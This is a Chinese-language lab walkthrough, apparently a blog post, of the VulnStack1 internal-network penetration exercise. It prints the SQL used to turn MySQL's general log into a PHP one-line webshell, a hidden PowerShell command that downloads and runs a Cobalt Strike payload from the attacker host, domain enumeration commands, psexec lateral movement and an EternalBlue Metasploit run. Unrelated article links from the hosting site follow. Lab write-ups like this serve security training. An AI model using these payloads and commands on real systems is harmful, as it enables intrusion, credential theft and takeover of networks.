VulnStack1-内网渗透记录

news2024/11/26 0:20:28

网络结构

kali192.168.20.145
windows7192.168.20.148/192.168.52.143
2008192.168.52.138
Win2k3192.168.52.130

三台虚拟机IP初始状态固定为192.168.52.0/24网段,所以将仅主机模式的网卡设置为192.168.52.0/24网段

漏洞利用

phpStudy

首先查看windows7的web服务,是phpStudy,此处测试到Mysql弱口令root/root

image-20240807104917254

之后扫描目录发现/php,有熟悉的应该知道这个路径

image-20240807105218744

通过弱口令进入phpMyAdmin

image-20240807105508426

之后开始想可利用点,

首先可以想到Mysql-udf提权,有个限制条件就是secure-file-priv开启,

SHOW VARIABLES LIKE "secure_file_priv";

image-20240807110202917

发现返回NULL,也就是禁止操作。为空就是不限定写入目录,如果有路径就是限制指定目录。

之后考虑phpstudy通过日志的提权,之前学习中也涉及到过日志中毒攻击(把一句话木马写入日志,服务器解析日志php文件)。

先查询下日志相关设置

SHOW  VARIABLES  LIKE  "general%"

image-20240807135102363

general_log是日志文件开关,general_log_file日志保存在哪个路径。

把开关开启

网站路径也可以通过 select @@basedir获取Mysql储存数据库文件的路径

set global general_log = "ON"
set global general_log_file = "C:/phpStudy/WWW/log.php" /*网站路径在phpStudy探针页面可以找到,注意日志文件后缀为php类型*/

之后执行个带着一句话木马的SQL语句,写入log.php文件,让服务器解析就好了。

set '<?php $sl = create_function('', @$_REQUEST['klion']); $sl(); ?>';

YMCMS

蚁剑连接看网站目录发现还有一个yxCMS,可以访问查看下(另一个getshell方法)

image-20240808110508113

访问http://192.168.20.148/yxcms/

image-20240808111237156

在公告信息里就给出了后台路径和账号密码了,登进去看看

根据之前打vulnhub的思路,可以想到模板管理和文件上传的地方可能会出现getshell点。

image-20240808111725729

因为我们现在已经拿到shell了,下面拿个修改模板举例子。

image-20240808113219001

成功拿到shell

image-20240808113353301

内网渗透

让windows7在CS上线

生成payload

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.20.145:9999/a'))"

image-20240808165321331

放在蚁剑执行,windows7在CS上线

image-20240808165457109

运行shell systeminfo查看主机信息,可以看到god.org

image-20240820165310169

之后用mimikatz尝试抓取明文密码

image-20240820165644758

之后net view查看域内机器

image-20240820220208033

net view                          #查看局域网内其他主机名
net config Workstation            #查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                          #查看本机用户列表
net user /domain                  #查看域用户
net localgroup administrators     #查看本地管理员组(通常会有域用户)
net view /domain                  #查看有几个域
net user 用户名 /domain            #获取指定域用户的信息
net group /domain                 #查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain                #查看域中某工作组
net group "domain admins" /domain     #查看域管理员的名字
net group "domain computers" /domain  #查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名(可能有多台)

查看域管 administrator

image-20240820214932078

查看域控 OWA

image-20240820215024420

CS_psexec横向移动

添加smb的监听,进行横向

image-20240820175606086

image-20240820175634893

之后OWA上线

image-20240820215446414

相同的可以上线windows2003

image-20240820220500329

image-20240820220552377

CS联动msf

kail上msf开启监听

image-20240821141627556

CS新建监听器

image-20240821141656850

win7靶机在msf上线

image-20240821141818142

可以用run post/windows/gather/checkvm判断是否是虚拟机

这个靶场的配置kali应该是不能直接通2008和2003的,所以要设置静态路由通过拿到的session当作跳板机访问2008和2003

image-20240821160321220

或者在session中使用

run autoroute -p  #查看路由
run autoroute -s 192.168.52.0/24

效果是一样的

永恒之蓝

msf自带的端口portscan扫描可以扫到2008的445端口,进行永恒之蓝尝试

漏洞扫描

image-20240821143421382

发现漏洞进行利用

search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.52.138
set lport 5555
run

image-20240821144856877

显示no session was created

尝试再开一个msf进行监听,也不行,攻击流程就是这样的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2060869.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

个人理解—uboot启动过程(1)

在前文关于MKCONFIG的常用配置参数与链接脚本中逐渐的引入了通过uboot的文件启动校验头引入了uboot的汇编部分&#xff0c;该部分是为了去启动后续的uboot的c语言部分&#xff0c;但是c语言是需要使用到内存的&#xff0c;所以可用理解为&#xff1a;该汇编部分的主要目的就是为…

python异步编程-channels使用,创建websocket服务

目录 channels介绍准备工作创建python虚拟环境安装channels安装django安装daphne创建django项目创建chat应用 配置instance项目简单聊天室页面在chat应用中创建模板base.htmlroom.html 添加视图添加路由添加urls.py项目路由添加chat转发路由启动同步服务器 搭建websocket服务创…

H5 Q绑查询系统源码

源码名称&#xff1a;H5 Q绑查询系统源码 源码介绍&#xff1a;H5Q绑查询系统源码由2个H5单页组成&#xff0c;无需数据库或PHP环境。上传后修改接口即可运行。 需求环境&#xff1a;H5 下载地址&#xff1a; https://www.51888w.com/208.html

鸿蒙内核源码分析(重定位篇) | 与国际接轨

一个程序从源码到被执行&#xff0c;当中经历了3个过程&#xff1a; 编译&#xff1a;将.c文件编译成.o文件&#xff0c;不关心.o文件之间的联系.静态链接&#xff1a;将所有.o文件合并成一个.so或.out文件&#xff0c;处理所有.o文件节区在目标文件中的布局.动态链接&#xf…

将所有PPT中的字体颜色白色改成黑色---使用AI提高效率

背景 在工作中&#xff0c;遇到一个PPT&#xff0c;老板需求&#xff0c;将PPT页面的所有的字体从白色改成黑色&#xff0c; 检查了发现&#xff0c;这个ppt有几个问题&#xff0c;没有使用母版&#xff0c;都是每一页进行编写&#xff0c; 一共500多页&#xff0c; 如果每个…

Markdown中使用 LaTeX 绘图 -- TikZ

Markdown中使用 LaTeX 绘图 -- TikZ 1 介绍1.1 概述1.2 与其他图包对比 2 示例 & 学习[The TikZ and PGF Packages](https://tikz.dev/)[Graphics with TikZ in LaTeX](https://tikz.net/)[TikZ PGF Manual](https://www.bu.edu/math/files/2013/08/tikzpgfmanual.pdf)[在 …

中科亿海微伺服控制FOC解决方案

随着科技的不断进步和应用的不断扩展&#xff0c;电机控制技术的需求也在不断增加&#xff0c;主要的电机控制需求包括高精度控制、高效率、高可靠性和智能化等。 FOC&#xff08;磁场定向控制&#xff09;&#xff0c;也被称作VC&#xff08;矢量控制&#xff09;&#xff0c…

从用户体验说起,集运系统需要哪些重要的功能?

良好的用户体验是服务成功的关键&#xff0c;更是客户持续选择的理由。用户体验层面最简单的表达其实就是&#xff1a;别让我等、别让我想、别让我烦。 在当今时代&#xff0c;用户的期望正在不断提高&#xff0c;他们追求快捷、高效和透明的服务。因此&#xff0c;集运系统在…

生信圆桌x生信菜鸟团:生物信息学初学者的交流与成长社区

生信菜鸟团是一个专门为生物信息学初学者和爱好者打造的在线社区&#xff0c;致力于为广大生信学习者提供一个分享知识、交流经验、共同成长的平台。随着生物信息学在各大领域的快速发展&#xff0c;越来越多的研究者和学生开始涉足这一领域&#xff0c;但生信知识的广度和深度…

人才流失预测项目

在本项目中&#xff0c;通过数据科学和AI的方法&#xff0c;分析挖掘人力资源流失问题&#xff0c;并基于机器学习构建解决问题的方法&#xff0c;并且&#xff0c;我们通过对AI模型的反向解释&#xff0c;可以深入理解导致人员流失的主要因素&#xff0c;HR部门也可以根据分析…

备战秋招60天算法挑战,Day22

题目链接&#xff1a; https://leetcode.cn/problems/missing-number/ 视频题解&#xff1a; https://www.bilibili.com/video/BV1HS42197Hc/ LeetCode 268.丢失的数字 题目描述 给定一个包含 [0, n] 中 n 个数的数组 nums &#xff0c;找出 [0, n] 这个范围内没有出现在数组…

基于Python flask的岗位招聘数据分析系统,应用Python、Flask框架、Pyecharts、Wordcloud等技术

基于Python Flask的岗位招聘数据分析系统旨在为企业人力资源部门和求职者提供一个全面的数据分析平台&#xff0c;通过对招聘数据的深度挖掘和可视化展示&#xff0c;帮助用户做出更明智的决策。该系统采用了Python、Flask框架&#xff0c;并结合Pyecharts、Wordcloud等技术&am…

Matplotlib基本操作

1.什么是Matplotlib matplotlib 是一个广泛使用的 Python 图形库&#xff0c;用于生成静态、动态和交互式的可视化图表。它最初由 John D. Hunter 创建&#xff0c;并首次发布于2003年。matplotlib 提供了一个面向对象的 API&#xff0c;允许用户创建多种类型的图表&#xff0c…

[JavaScript版本五子棋小游戏]

目录 全部运行代码&#xff1a;五子棋游戏的基本步骤&#xff1a;代码剖析&#xff1a;1. 初始化游戏界面2. 管理游戏状态3. 玩家交互4. 电脑AI5. 胜负判定6. 游戏控制 本文通过实现一个基本的五子棋游戏&#xff0c;展示了如何使用HTML、CSS和JavaScript来构建一个简单的交互式…

ATGM332D-F8N低功耗、小尺寸单北斗多频定位导航模块规格书

ATGM332D-F8N主要 特征 &#xff1a; 1、多频点单北斗接收机 支持B1C独立定位通道数目&#xff1a;176通道支持北斗二号、北斗三号支持B1I、B1C、B2I、B3I、B2a、B2b 定位精度 单点定位精度&#xff1a;<1.0mCEP50推算定位误差&#xff1a;<3&#xff05;&#xff08;定位…

伦敦银行情的软件有什么选择?

普通投资者做伦敦银交易&#xff0c;多以技术分析为主、基本分析为辅的方法作为自己的交易策略&#xff0c;既然提到技术分析&#xff0c;那么伦敦银行情的软件就至关重要&#xff0c;因为我们需要通过这些软件才能看到行情并进行分析&#xff0c;那看伦敦银行情的软件有什么好…

2024.8.21

130124202408211006 DATE #:20240821 ITEM #:DOC WEEK #:WEDNESDAY DAIL #:捌月拾捌 TAGS < BGM "琴师--要不要买菜" > < theme oi-contest > < [NULL] > < [空] > < [空] > 此情可待成追忆&#xff0c;只是当时已惘然 -- 《锦瑟》…

「OC」视图控制器的懒加载策略

「OC」视图控制器的懒加载策略 文章目录 「OC」视图控制器的懒加载策略懒加载懒加载的优点常见的懒加载实现方法使用懒加载的注意事项 控制器的懒加载参考资料 懒加载 懒加载&#xff08;Lazy Loading&#xff09;是一种设计模式&#xff0c;其核心思想是在需要时才进行对象的…

Verilog刷题笔记55

题目&#xff1a; Exams/ece241 2014 q5a You are to design a one-input one-output serial 2’s complementer Moore state machine. The input (x) is a series of bits (one per clock cycle) beginning with the least-significant bit of the number, and the output (Z)…

更快更强,SLS 推出高性能 SPL 日志查询模式

作者&#xff1a;无哲 引言 随着数字化进程的持续深化&#xff0c;可观测性一直是近年来非常火热的话题&#xff0c;在可观测的三大支柱 Log/Trace/Metric 中&#xff0c;日志&#xff08;Log&#xff09;数据一般是最为常见的&#xff0c;企业迈向可观测性的第一步&#xff…